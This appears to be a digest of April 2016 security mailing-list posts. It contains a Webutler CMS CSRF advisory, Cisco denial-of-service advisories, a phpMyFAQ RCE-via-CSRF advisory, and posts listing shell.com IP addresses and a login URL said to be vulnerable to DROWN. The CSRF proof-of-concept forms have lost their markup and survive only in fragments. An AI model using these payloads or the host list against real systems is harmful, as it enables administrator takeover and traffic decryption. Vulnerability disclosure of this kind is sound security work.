Webutler CMS 3.2 - Cross-Site Request Forgery

[displaymyname]

*# Exploit Title: Webutler CMS Cross-Site Request Forgery*
*# Date: 18 April 2016*
*# Exploit Author: Keerati T. (Post)*
*# Vendor Homepage: http://webutler.de/en *
*# Software Link: http://webutler.de/download/webutler_v3.2.zip
*
*# Version: 3.2*
*# Tested on: Linux*
 
*1.Description*
The Webutler is a simple online page editor for static HTML files.
Webmasters can provide a simple login option for image and text editing to
their customers. The Webutler is a tool for websites or projects to be
implemented with a small effort. The project has grown over the years and
now you can do a lot of things with it.
The all of administrative function allow any users to perform HTTP request
without verify the request. This exploit can be performed while the logged
on user (administrator) visit malicious web page that embedded HTML form.
 
 
*2. Proof of Concept*
Only change password function PoC, But other function (add page, delete
page, etc..) can be exploited.
 

  
http://10.0.0.102/webutler/admin/system/save.php";
method="POST">
  
  
  
  
  
  

  
  document.forms[0].submit();

 
 
*3. Timeline*
11 Apr 2016 - Vulnerability discover.
11 Apr 2016 - No main contact available on vendor web page. Ask related
contact that shown on vendor web page instead.
18 Apr 2016 - No response from related contact and vulnerability disclosed.

Cisco Security Advisory: Multiple Cisco Products libSRTP Denial of Service Vulnerability

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Multiple Cisco Products libSRTP Denial of Service Vulnerability

Advisory ID: cisco-sa-20160420-libsrtp

Revision 1.0

For Public Release 2016 April 20 16:00 UTC (GMT)

+-

Summary
===

Cisco released version 1.5.3 of the Secure Real-Time Transport Protocol (SRTP) 
library (libSRTP), which addresses a denial of service (DoS) vulnerability. 
Multiple Cisco products incorporate a vulnerable version of the libSRTP library.

The vulnerability is in the encryption processing subsystem of libSRTP and 
could allow an unauthenticated, remote attacker to trigger a DoS condition. The 
vulnerability is due to improper input validation of certain fields of SRTP 
packets. An attacker could exploit this vulnerability by sending a crafted SRTP 
packet designed to trigger the issue to an affected device.

The impact of this vulnerability on Cisco products may vary depending on the 
affected product. Details about the impact on each product are outlined in the 
"Conditions" section of each Cisco bug for this vulnerability. The bug IDs are 
listed at the top of this advisory and in the table in "Vulnerable Products."

This advisory is available at the following link: 

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-libsrtp

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (SunOS)

iQIVAwUBVw6aV689gD3EAJB5AQLT7hAAnEhIXtGqfH9FEGyzLoE+NZ98c0TVnAQY
SzOIo9NAVtEYuPSbnybPiqVnjQGmHgU+BI8NgTLvvs15rxJOSeI040rLBqZQfhMA
gZ0P6t7fcyz5k0jXwbITxeFWSRFAOCkIwaUKfVkq1IfHeKO+UFFH0eQRFtMeU1ji
Bos+0CJ2fpjTIZyHkNl6IcIPZDtfeRwN+xf0C5VdHk6NIRDfbXY1Tz/qqIE9EJIy
O8Ml2yjY8EWAmbTzvSluGzeyXt7IvdmSwnNQLhHhhZzBmJKRqwagm75vftiFsWvy
sycEVG9phmG3w2hubqufV4B7LeBSUmF7OPRi+RV2oH9pdwMYXoNTa87tXWs93tj6
tR8FkHfdN0p3EEVmY4RzFAEy5kw+XsIDxiCkioqCecIwbRTJ6JNdLd7O6Cq6XW53
G5uHWG7HMvkRHEhXsvRbiWhXf4klhV/0gk7OXQQ/wVpadXnqP2SeaCbg56NduRvr
svfKPFZLsJ9M20J5f2sqWPEPVqPlxqV6Qr74Qh3sZ5XMCUtDWUVugMfgqH9emgil
8EVa2FMk0MndiLzJytqlNUkLUAgjXYEFitZ9MFeWF+eJQV17BZn5kkhnbQ/jNO4F
d5dcBBMQBBX9VgNhNkse1kra5rRkgQFzbK9kn7ZL4yVRxIH9pggEYhEklymYkF7P
p4CulSF+1Wk=
=wL3f
-END PGP SIGNATURE-

Cisco Security Advisory: Cisco Adaptive Security Appliance Software DHCPv6 Relay Denial of Service Vulnerability

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Adaptive Security Appliance Software DHCPv6 
Relay Denial of Service Vulnerability

Advisory ID: cisco-sa-20160420-asa-dhcpv6

Revision 1.0

For Public Release 2016 April 20 16:00  GMT (UTC)

+-

Summary
===

A vulnerability in the DHCPv6 relay feature of Cisco Adaptive Security 
Appliance (ASA) Software could allow an unauthenticated, remote attacker to 
cause an affected device to reload.

The vulnerability is due to insufficient validation of DHCPv6 packets. An 
attacker could exploit this vulnerability by sending crafted DHCPv6 packets to 
an affected device, resulting in a denial of service (DoS) condition.

This vulnerability affects systems configured in routed firewall mode and in 
single or multiple context mode. Cisco ASA Software is affected by this 
vulnerability only if the software is configured with the DHCPv6 relay feature. 
The vulnerability is triggered only by IPv6 traffic.

This vulnerability affects Cisco ASA Software release 9.4.1 only.

Cisco has released software updates that address this vulnerability. There are 
no workarounds that address this vulnerability.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-asa-dhcpv6





-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2
Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJXF3DCAAoJEK89gD3EAJB5pscP/A82fZg0GxmGGZlQR0YGSC/F
M1jaBmDHh1/Hofa0Wi1jTsUiEQBFRh/NzrW7PAF1xxz8oFA09l050HOXc1uqbwyl
kFZn5/gnNOOl8FJ7E7Uq3yB1690XelnFMV5T86tiFTssmAHJWjtc/H/F/C8pate6
yNxm/ns+XJKODkgFId8WtXSiRm2TLSc7KaLSb4CiAy8IZzKyu1jXE7CNWvzdfi+y
FdBR8nVdqZDW0VTJ6dVzYcWls3+wbcJAesZtAWJS9RhbV5hWlumOVmbJe78wMff4
ZBZ/qy8yS3xSqA2qjNbPgszJuhTwudNKAagOOpkPUxze36s5J3Z+LKOaPGHKWgiD
rK/WVa7M2nD8N92NsOt/VQQ8D3KPW+iZ4UN4heQ8A/JC7/4OAc8bKt1cwkpspslX
/r2ihH0grTksybKjTGwHus0c4fWB5rKGeVZagb8rEiYi0hbGAblruUr6ovFlhA0U
2gpgwoXtQSj0DZLzPRfqxTEAZ2reC+Ny6TqbW1qokl43sWxguNW9lfJPxU1G1ub2
vIKwxz+Utq3xWQ9wvSDQ8lT3mJTj+Mu4KQNC6YEzd6kxJCf8z6Bseg2JMJyTlMRh
FADKRiamRkfQhUa8C6J4DQa4PFIQb7oVbaNBKuSKZd77mGM/+6L1mXF1/TGlnLgH
VfzhOiSQd2rx3zyxsjG1
=nIGk
-END PGP SIGNATURE-

Cisco Security Advisory: Cisco Wireless LAN Controller HTTP Parsing Denial of Service Vulnerability

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Wireless LAN Controller HTTP Parsing Denial of 
Service Vulnerability

Advisory ID: cisco-sa-20160420-htrd

Revision 1.0

For Public Release 2016 April 20 16:00  GMT (UTC)

+-

Summary
===

A vulnerability in the HTTP URL redirect feature of Cisco Wireless LAN 
Controller (WLC) Software could allow an unauthenticated, remote attacker to 
cause a buffer overflow condition on an affected device, resulting in a denial 
of service (DoS) condition.

The vulnerability is due to improper handling of HTTP traffic by the affected 
software. An attacker could exploit this vulnerability by sending a crafted 
HTTP request to an affected device. A successful exploit could allow the 
attacker to cause a buffer overflow condition on the device, which could allow 
the attacker to cause the device to reload, resulting in a DoS condition, or 
execute arbitrary code on the device.

Cisco has released software updates that address this vulnerability. There are 
no workarounds that address this vulnerability. 

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-htrd
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJXF4vuAAoJEK89gD3EAJB52hYQALm85XJaGPUEVNKU5qO5XXgS
DNXebsZBGXOKiR+4Q/meIrsFfDwSclIXmyK6Xwecxg+ye2thqXyj9oOBIK1svXTb
dDb1LixwfvHZGvpjqd38gF6xrzOiGARjuJPlUetWR7IqW1xLiD1Qvx0grf6HFyoC
ASpUSKuBRyUs4rYvJ2HewGwgCDVqKWriTZ1ZuyNFkJeiUWRW8IyASkiirTYkDj+g
+whHTjdZ5ilzD44aAhdWk+Np7GYom4YAjrhrRdW9kxkSvkTDwsKbZJbBLAXGM2AC
GwqxE4Qltw1AbWEJ9w7HXY+SKI0xBhpsm/WBoOfO8kShdT8M0TMxSh8Fga50/C3v
2sZVusZE+3IpqY8CF/1WXYL85sFxNRXhDfae0EiiT1rZSO68zdz48GhuUBllpJT8
AVjupNOg3GWyhFuJzaUlv9sCZT6chwd/J2sRqTNPDelpaMCaLEY5oVeS6noheK1/
VQHAC5DwOer+LR5OmxdG+4ZQbxPSqgFfOxfSxe/pwql3YmWyzFRZQmGkhz05odNH
ywalsvEhMJIcJMl9kF4mBLji1hUg6D6XxpxGNEMpfPimiEAQWvKEb/YkC25YtIeZ
N9kR4sc7e0NIvysq+2UiIDe1QxdBF6SPZl8HnlYvTsVJ2vBKI+x1uN9dvtFXpW0p
fg9E9sebxbEmxJCvhNFi
=v8Ma
-END PGP SIGNATURE-

Cisco Security Advisory: Cisco Wireless LAN Controller Denial of Service Vulnerability

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Wireless LAN Controller Denial of Service 
Vulnerability

Advisory ID: cisco-sa-20160420-bdos

Revision 1.0

For Public Release 2016 April 20 16:00  GMT (UTC)

+-

Summary
===

A vulnerability in the Bonjour task manager of Cisco Wireless LAN Controller 
(WLC) Software could allow an unauthenticated, remote attacker to cause a 
denial of service (DoS) condition on an affected device.

The vulnerability is due to improper handling of Bonjour traffic by the 
affected software. An attacker could exploit this vulnerability by sending 
crafted Bonjour traffic to an affected device. A successful exploit could allow 
the attacker to cause the device to reload, resulting in a DoS condition.

Cisco has released software updates that address this vulnerability. There are 
no workarounds that address this vulnerability.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-bdos
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJXF4vlAAoJEK89gD3EAJB5clYP/01GkHljmtfoWydE9FD9FrAa
/1gaCMs3t6XBpXZhC47V0ykYOLyW2I6eA7J28IIOa9Ujpqlxz2pIU3ptcBLGVVWm
1Zpjc2MWQF3v66DPtvfL7Wr0WZxaQXYN+WpXqcTOkDd2H+VlQRHMzKWYDfD57esy
s9KL3gActveVDV/51tXHLXlob+9aaK4aeHzKr13GfrvL55k1T5Ea4670o03lqbN8
Dp7Smlu3MhowJEF/e4HOcBxKLZKrh44IX1M3KMkprvp8H60igP74atHgQg7ZwUym
db4DqjMFsyXuMX8m8seGI851OsfxYUi5sRP51tAolBY3EGaWN/+kbI8FCp5l3UN9
Ezlwmfn7er8szbaJ3rzE2yLChyAyeNwL6+SSMhqTWvUfmmwmyP9/OHRGaO1S38tT
OEELsiupGh0e/G2FVom/tqzm9KBK8IDWl+JgR2fRWgJjQQkGZoCFVzAGX+l+vXEF
lYTlvt17JmXzcozEcndVtdOhOiQOFlOABr1Okor+e5vGKhVfC+9bYCq6hAU2fzH7
Wb5fb35cXXUoY7fJxmLwUodMyjEC/7ZueggmLgQlfyR75d6jnX+VPQXXBSamaaeP
peb767C7f59ppK0PA4XMy6z8V0d741nQzJlHBWZci1tfnQvDy38NX1p/+HoLaEGS
ERe2NvYmEe2Zt/vZl+b/
=wyDe
-END PGP SIGNATURE-

Cisco Security Advisory: Cisco Wireless LAN Controller Management Interface Denial of Service Vulnerability

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Wireless LAN Controller Management Interface 
Denial of Service Vulnerability

Advisory ID: cisco-sa-20160420-wlc

Revision 1.0

For Public Release 2016 April 20 16:00  GMT (UTC)

+-

Summary
===

A vulnerability in the web-based management interface of Cisco Wireless LAN 
Controller (WLC) devices running Cisco AireOS Software could allow an 
unauthenticated, remote attacker to cause an affected device to reload, 
resulting in a denial of service (DoS) condition.

The vulnerability is due to the presence of unsupported URLs in the web-based 
device management interface provided by the affected software. An attacker 
could exploit this vulnerability by attempting to access a URL that is not 
generally accessible from and supported by the management interface. A 
successful exploit could allow the attacker to cause the device to reload, 
resulting in a DoS condition.

Cisco has released software updates that address this vulnerability. There are 
no workarounds that address this vulnerability.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160420-wlc
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJXF4vBAAoJEK89gD3EAJB5DyEQAOZXYD8FI8cLQMVasgCJ2rv5
K8kiwYTZ6RQj0PgdeTk4Ed6UMbi0iT0XYt8E8lo73TNCEm9mqN9nPCXX0Kxsa/06
+aK1yDgB+wxbbrvQ+JNDO6GHWzcjB98giv6lVN8dTDzO8nEP12q1EvV7xKREc7Tz
AJ2xTEOWgpTPEwDG0NxA5ihsxjtPRj52w1m0uxJladV1VFlvfGqmiA2NK7PdRUjz
+5FpbVNG/fBzJCkjQQPjyZViYsAPaeRQnQMfIUov6D7Ta0RYWe+qlSwjmfElR8Pb
BdeACjVsCEZ+YLrQgsyBXZ4MVf8+CL4VdC4M4vrRnxWqVatqdUqNVlsGrovyuVDh
PijWM0pmS/yk12M4KIpjPzPlwJbC9vs4s7qaJXaP+94YvtJwzGAuT9LrWohMExfJ
kQmmCn+Cy/TpX4qMzbN0i5+n+at9KPqHRdSHlnqCTY8eQkxOhY3vt6fbl1z5JkMh
vvq3C9nXC6cQ/Jat36MmXRI3Ky++CzZ1od9joRb1kRAijlM7ZF9hjC0cqsWNX9O1
4XXo4wZ/VaJRUWmSHTMsjY2Yk8ccq1bq8agkOQm+sSBvn36LVrjKpC7ZZEIavnwt
w9A+xLOoVMffa8QiUnLzKu9YuztfHmpWt9wsalhBwaAxeXtxNKKh8GUUtucDo6m0
fclgfYYNyMiUShiD48JD
=FKA2
-END PGP SIGNATURE-

RCE via CSRF in phpMyFAQ

[High-Tech Bridge Security Research]

Advisory ID: HTB23300
Product: phpMyFAQ
Vendor: http://www.phpmyfaq.de 
Vulnerable Version(s): 2.8.26, 2.9.0-RC2 and probably prior
Tested Version: 2.8.26, 2.9.0-RC2
Advisory Publication:  March 30, 2016  [without technical details]
Vendor Notification: March 30, 2016 
Vendor Patch: April 11, 2016 
Public Disclosure: April 20, 2016 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: High 
CVSSv3 Base Score: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a high-risk security 
vulnerability in a popular multilingual FAQ software phpMyFAQ. A remote 
attacker can execute arbitrary PHP code on vulnerable system via CSRF attack 
against website administrator and completely compromise vulnerable web 
application. 

The vulnerability exists due to application does not properly verify origin of 
HTTP requests in "Interface Translation" functionality. A remote 
unauthenticated attacker can create a specially crafted malicious web page with 
CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP 
request, as if it was coming from the legitimate user, inject and execute 
arbitrary PHP code on the target system with privileges of the webserver. 

A simple CSRF exploit below can be used to inject "phpinfo()" PHP function into 
file "/lang/language_af.php":


 http://[host]/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_added_trans";
 method="POST" name="main">






document.main.submit();


To trigger the execution of "phpinfo()", just open the following file in your 
browser (no privileges required): 


 http://[host]/"; method="POST">







---

Solution:

Update to phpMyFAQ 2.8.27 or 2.9.0-RC3

More Information:
http://www.phpmyfaq.de/security/advisory-2016-04-11

---

References:

[1] High-Tech Bridge Advisory HTB23300 - 
https://www.htbridge.com/advisory/HTB23300 - RCE via CSRF in phpMyFAQ
[2] phpMyFAQ - http://www.phpmyfaq.de - Open Source FAQ software
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

shell.com vulnerable TLS

[shell]

Decrypting RSA using Obsolete and Weakened eNcryption

107.21.222.4:443



23.21.217.254:443




107.20.182.27:443



95.138.155.170:443



54.229.231.88:443



54.229.137.226:443



50.19.91.245:443


50.19.92.226:443




50.16.219.106:443



23.23.114.55:443

*.Shell.com Port 443 DROWN decryption attack

[shell]

Login: 

https://prom3.shell.com/(S(qxq1noy1f4gl4g45kbggia45))/Common/Login.aspx

Vulnerability

An attacker can decrypt traffic and get login and passwords


Signatures

584e3a64196dc662286922fc82fa915f1ee0cc46ab5400c347f529ab4eb46c67
prom3.shell.com
d50be93e35266af753e288af8f4f3eb96986187264a44c6c0d741d051443b1cc

443.https.ssl_2.certificate.parsed.fingerprint_sha256: 
5c3bd6ba5b682650ceba4e167023d48e4627a2d7c2005f7f1fdad6f45b3e53a6 

 443.https.tls.certificate.parsed.fingerprint_sha256: 
5c3bd6ba5b682650ceba4e167023d48e4627a2d7c2005f7f1fdad6f45b3e53a6